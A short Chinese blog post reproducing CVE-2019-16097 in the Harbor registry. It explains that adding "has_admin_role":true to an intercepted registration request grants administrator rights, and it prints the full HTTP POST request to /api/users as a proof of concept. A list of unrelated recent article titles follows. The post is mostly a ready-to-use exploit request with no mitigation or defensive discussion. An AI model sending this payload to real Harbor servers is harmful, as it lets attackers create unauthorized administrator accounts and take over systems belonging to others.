Harbor任意管理员注册漏洞复现CVE-2019-16097
2024-09-05 21:51:00
注册时抓包
添加poc
"has_admin_role":true
管理员权限
POC
POST /api/users HTTP/1.1
Host: 127.0.0.1
Content-Length: 131
Accept: application/json
Origin: http://127.0.0.1
User-Agent: Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14
Content-Type: application/json
Referer: http://127.0.0.1/harbor/sign-in
Accept-Language: zh-CN,zh;q=0.9
Cookie: sid=5bb9aad90164bd2ed5274edaf20f9c81
Connection: close
{"username":"mrhonest","email":"mrhonest@qq.com","realname":"mrhonest","password":"111111Aaa","comment":"11111","has_admin_role":true}
最新文章
- 日向blog开发记录
- sftp自动授权登录
- css取消input、select默认样式(手机端)
- Mule ESB 社区版 企业版 资源下载 包含3.5和3.6
- PHP常量PHP_SAPI与函数php_sapi_name()简介,PHP运行环境检测
- C++学习39 异常处理入门(try和catch)
- 【腾讯内部干货分享】分析Dalvik字节码进行减包优化
- find the safest road(floyd)
- OC 代理 协议 委托 数据源的概念
- Qt for Windows:使用WinPcap开发高性能UDP服务器
- 分享一个图片上传插件(TP5.0)
- easyui下载包详解
- Hper-V卸载
- JavaScript代码压缩工具UglifyJS和Google Closure Compiler的基本用法
- Spring AOP Capabilities and Goal
- Hive HiveServer2+beeline+jdbc客户端访问操作
- sql server 小技巧(6) Cannot resolve the collation conflict between ";Latin1_General_CI_AI"; and ";Chinese_PRC_CI_AS"; in the equal to operation
- k8s踩坑记第2篇--3个IP折磨人的故事
- java关于split分割字符串,空的字符串不能得到的问题
- g2o error